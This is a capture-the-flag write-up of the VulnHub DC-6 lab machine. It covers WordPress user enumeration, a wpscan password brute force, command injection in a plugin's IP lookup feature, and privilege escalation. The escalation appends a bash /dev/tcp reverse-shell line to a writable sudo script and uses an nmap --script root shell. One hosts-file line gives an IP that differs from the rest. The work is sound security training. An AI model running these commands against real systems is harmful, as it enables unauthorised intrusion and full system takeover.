VulnHub: DC-6 Writeup

DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and nmap which allows me to escalate to other users then straight to root.

Reconnaissance

Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine’s IP address is most likely 192.168.2.104.

arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Arpscan

With initial scan, nmap shows two ports open: SSH on port 22 and Apache Web Server on port 80.

nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
Nmap scan

From the results above, there’s a redirection to http://wordy/ on port 80. To properly resolve the web, I’ll add wordy to my /etc/hosts file.

echo '192.168.1.104   wordy' >> /etc/hosts

This page clearly states that it’s a WordPress site.

Wordy homepage

Nothing interesting to explore here, but the text secure plugins seems to be a hint from the machine’s author.

Runningnmap script against this website finds several usernames.

nmap -p 80 --script "http-wordpress*" wordy
Nmap WordPress script

I’ll save those usernames into a file called users.

wpscan identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.

wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
Wpscan

I’m interested with the RCE one, but before that I’ll have to find creds.

At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from rokyou.txt.

Clue

I’ll create new wordlist from rockyou.txt and then use it to perform a brute force attack using wpscan.

wpscan --url http://wordy/ --usernames users --passwords passwords.txt
Brute-force

It returns one valid credentials: mark:helpdesk10.

Valid login

Foothold

With the credentials I obtained, I can login into WP Dashboard.

WP Dashboard

From the previous wpscan, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.

The exploit PoC exploits a vulnerability that comes from this IP tools feature.

IP Lookup

I’ll hit the lookup button and intercept the request on Burp.

RCE can be achieved by adding a set of malicious OS commands after the command pipe |, semi colon ; (stacked command), or logical OR || at the ip section. In this case, I send a reverse shell.

Reverse shell

Privilege Escalation

The home directory is readable by www-data and there are two interesting files: backups.sh and things-to-do.txt.

Interesting files

I immediately checked the contents of backups.sh and things-to-do.txt.

The backups.sh script is writable by group devs, and I’ll note that.

Contents of backups.sh

And this things-to-do.txt contains graham’s credentials.

Contents of things-do-do.txt

I tried the graham’s creds, graham:GSo7isUM1D4, on SSH, and it worked.

SSH graham

User graham has sudo privileges on the backups.sh script, and this allows me to run the script as user jens.

Sudo privileges on backups.sh

Because the script is also writable by graham (devs group), I can exploit this to escalate myself to jens by adding a reverse shell line to the script and then run it with sudo.

graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Escalate to jens

I found out that user jens is allowed to execute nmap as root user.

Sudo privileges on nmap

I can also exploit this using reference from GTFObins.

jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Escalate to root

And here is the flag:

Root flag of DC-6

Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store